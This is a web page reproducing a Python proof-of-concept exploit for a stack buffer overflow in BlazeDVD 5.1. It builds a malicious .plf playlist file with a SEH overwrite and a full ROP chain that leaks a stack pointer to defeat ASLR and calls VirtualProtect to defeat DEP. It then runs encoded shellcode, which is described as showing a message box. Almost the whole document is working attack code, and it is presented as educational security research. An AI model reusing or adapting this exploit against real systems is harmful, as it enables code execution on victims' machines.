扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 |
#!/usr/bin/python # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # BlazeDVD v5.1 (.plf) Stack Buffer Overflow PoC exploit - ALSR/DEP bypass on win7 # Author: mr_me - https://net-ninja.net - mr_me[AT]corelan.be - @StevenSeeley # Download: http://www.blazevideo.com/ # Tested on windows 7 version N - DEP = AlwaysOn # Greetz: Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # Greetz to ryujin ! :P # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # This PoC demonstates how we can bypass ASLR by stealing a # pointer off the stack and calculating the offset. # Then setup the VirtualProtect() call and execute it to bypass DEP as well. # All addresses are from ALSR non protected modules with BlazeDVD. # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # write-up here: http://net-ninja.net/blog/?p=124 def banner(): print "|------------------------------------------------------------------|" print "| __ __|" print "| _________________/ /___ _____ / /________ _____ ___|" print "|/ ___/ __ \/ ___/ _ \/ / __ <code>/ __ \ / __/ _ \/ __ </code>/ __ `__ \ |" print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |" print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/|" print "||" print "|-------------------------------------------------[ EIP Hunters ]--|" print "[+] BlazeDVD v5.1 (plf) Stack Buffer Overflow PoC exploit - ALSR/DEP bypass on win7" # MessageBoxA - "mr_me defeats ASLR & DEP !" sc = ("\xbf\x3a\x13\x11\xdd\xd9\xc8\x33\xc9\xb1\x4b\xd9\x74\x24" "\xf4\x5b\x31\x7b\x14\x83\xeb\xfc\x03\x7b\x10\xd8\xe6\xc8" "\x36\x87\xd0\x9f\xec\x43\xd3\x8d\x5f\xd1\x25\xfb\xc4\xae" "\x37\xcb\x8f\xc6\xbb\xa0\xe6\x3a\x4f\xf0\x0e\xc9\x31\xdd" "\x85\xfb\xf5\x52\x82\x76\xf5\x34\xb3\xa9\x06\x27\xd3\xc2" "\x95\x8c\x30\x5f\x20\xf1\xb3\x0b\xae\x71\xc5\x59\x3b\xcb" "\xdd\x16\x66\xec\xdc\xc3\x74\xdb\x97\x98\x4f\xaf\x29\x70" "\x9e\x50\x18\x4c\x1d\x02\xdf\x8c\xaa\x51\x21\xc3\x5e\x67" "\x66\x32\x91\x98\x97\x3b\x69\x1b\x4c\xeb\xfb\x3d\x07\xb1" "\x27\xc3\xf3\x23\xa3\xcf\x48\x20\xe9\xd3\x4f\xdd\x85\xe8" "\xc4\x20\x72\x79\x9e\x06\x9e\x1b\xdc\xf4\x96\xf2\x36\x71" "\x43\x8d\x75\xe9\x02\xc0\x77\x05\x48\x35\x1b\x2a\x92\x3a" "\xad\x91\x69\x7e\xd0\xc1\x90\xf3\xaa\xed\x70\xa6\x5c\x86" "\x86\xb9\x62\x11\x3d\x4e\xf5\x4d\xd2\x6e\xfa\xe5\x19\x5d" "\x2a\x91\x35\xd4\x41\x3c\xb4\x9e\xfa\x9a\x32\x16\xe4\xb4" "\xbd\x7d\xed\xb1\x80\x2e\x56\x69\xa6\x82\x14\xee\xbb\x38" "\x37\x18\x9d\xbf\x48\x27\x4a\x2d\xef\xf7\xab\xc5\x2f\xa3" "\xce\x74\x58\x39\x78\x03\xe1\xd5\x29\x8e\x72\x50\xa6\x3c" "\x14\xf4\x16\xd5\x95\x67\x25\x40\x2b\xac\x41\xd6\x6f\x47" "\xdb\x04\x07\x47\xfa\x92\xf8\xef\xdc\x66\xbc\xbf\x74\x2b" "\x6c\x1f\xa3\xdb\xe3\x7f\xea\x48\x6c\x19\x89\x0f\x18\x8d" "\x34\xf0\x84\x28\xdf\x9d\x36\xed\x72\x6f\x7e\x99\xc1\xab" "\x9a\x10\x38\x82\x48\x70\xe8\xb4\x3e\x8b\xde\x06\x7f\x23" "\x20\x3d\x77") junk = '\x43' * 312 ## This is where we land after our stack pivot ## rop2 = '\xe7\x57\x60\x61' # 0x616057E7 : # MOV AX,100 # RETN rop2 += '\x41\x41\x41\x41' # JUNK rop2 += '\x9f\xa5\x62\x61' * 73 # 0x6162A59F : # ADD EAX,20 # POP EBX # RETN rop2 += '\x44' * (612-len(junk)-len(rop2)) seh = '\xae\x74\x60\x61' # 0x616074AE : # ADD ESP,408 # RETN 4 ## leak ptr off the stack and calculate the offset for VirtualProtect() ## rop = '\x9f\xa5\x62\x61' * 62 # 0x6162A59F : # ADD EAX,20 # POP EBX # RETN rop += '\xf0\x8d\x62\x61' * 2 # 0x61628DF0 : # ADD EAX,0c # RETN rop += '\xe3\xd8\x01\x64' # 0x6401D8E3 : # POP EDI # RETN rop += '\x1b\x10\x10\x64' # 0x6410101B : # POP ESI # RETN rop += '\x3b\xf9\x60\x61' # 0x6160F93B : # MOV EBX,EAX # CALL EDI rop += '\x74\x0c\x32\x60' # 0x60320C74 : # SUB EBP,EBX # OR ESI,ESI # RETN rop += '\x27\x7e\x01\x64' # 0x64017E27 : # XOR EAX,EAX # RETN rop += '\xe1\x67\x01\x64' # 0x640167E1 : # ADD EAX,EBP # RETN 2 rop += '\x4d\xb2\x10\x64' # 0x6410B24D : # MOV EAX,DWORD PTR DS:[EAX] # RETN rop += '\x41\x41' # JUNK --------------------------^^ rop += '\x3e\xa0\x10\x64' # 0x6410A03E : # MOV EDX,EBX # JMP SHORT NetReg.6410A083 --> # PPR # RETN 10 rop += '\x41\x41\x41\x41' # JUNK (for the p/p/r) rop += '\x41\x41\x41\x41' # JUNK (for the p/p/r) rop += '\x05\x6c\x02\x64' # 0x64026C05 : # SUB EAX,EDX # RETN rop += '\x41\x41\x41\x41' # JUNK ---------------------------------------------------------------^^ rop += '\x41\x41\x41\x41' # JUNK rop += '\x41\x41\x41\x41' # JUNK rop += '\x41\x41\x41\x41' # JUNK rop += '\x05\x6c\x02\x64' * 14 # 0x64026C05 : # SUB EAX,EDX # RETN rop += '\x24\x41\x60\x61' * 88 # 0x61604124 : # ADD EAX,20 # RETN 4 rop += '\x41\x41\x41\x41' # JUNK ------------------------^^ rop += '\x97\x7d\x03\x64' * 6 # 0x64037D97 : # ADD EAX,-2 # RETN ## Setup the VirtualProtect() call ## rop += '\xa2\x8b\x60\x61' # 0x61608BA2 : # XCHG EAX,EDX # RETN rop += '\x27\x7e\x01\x64' # 0x64017E27 : # XOR EAX,EAX # RETN rop += '\x59\x9f\x03\x64' * 6 # 0x64039F59 : # ADD EAX,0C # RETN rop += '\x97\x7d\x03\x64' * 4 # 0x64037D97 : # ADD EAX,-2 # RETN rop += '\xa2\x8b\x60\x61' # 0x61608BA2 : # XCHG EAX,EDX # RETN rop += '\x24\x01\x64\x61' # 0x61640124 : # XCHG EAX,EBX # RETN rop += '\x27\x7e\x01\x64' # 0x64017E27 : # XOR EAX,EAX # RETN ## Calculate shellcode space ## rop += '\x59\x9f\x03\x64' * 65 # 0x64039F59 : # ADD EAX,0C # RETN rop += '\x24\x01\x64\x61' # 0x61640124 : # XCHG EAX,EBX # RETN rop += '\xe3\xd8\x01\x64' # 0x6401D8E3 : # POP EDI # RETN rop += '\x1c\x10\x10\x64' # 0x6410101C : # RETN (ROP NOP) rop += '\x7e\xa9\x60\x61' # 0x6160A97E : # XCHG EAX,EBP # RETN rop += '\x27\x7e\x01\x64' # 0x64017E27 : # XOR EAX,EAX # RETN rop += '\x74\x58\x02\x64' # 0x64025874 : # PUSH ESP # POP ESI # RETN rop += '\x60\x8f\x32\x60' # 0x60328F60 : # MOV EAX,ESI # POP ESI # RETN 4 rop += '\x71\x97\x32\x60' # 0x60329771 : # CALL EAX # JUNK --^^ rop += '\x59\x9f\x03\x64' # 0x64039F59 : # ADD EAX,0C # RETN rop += '\x41\x41\x41\x41' # JUNK ------------------------------------^^ rop += '\x59\x9f\x03\x64' * 5 # 0x64039F59 : # ADD EAX,0C # RETN rop += '\xf1\x2a\x10\x64' # 0x64102AF1 : # POP ECX # RETN rop += '\x80\xb1\x11\x64' # 0x6411b180 : # A writeable location from .data rop += '\x7e\xa9\x60\x61' # 0x6160A97E : # XCHG EAX,EBP # RETN rop += '\x07\x40\x63\x61' # 0x61634007 : # XCHG EAX,ESI # AND EAX,C95E0000 # RETN 0C rop += '\x31\x08\x62\x61' # 0x61620831 : # PUSHAD # RETN nops = "\x90" * 30 exploit = junk + rop2 + seh + rop + nops + sc print "[+] cst-blazedvd.pl exploit file created!" file=open('cst-blazedvd.plf','w') file.write(exploit) file.close() |
体验盒子
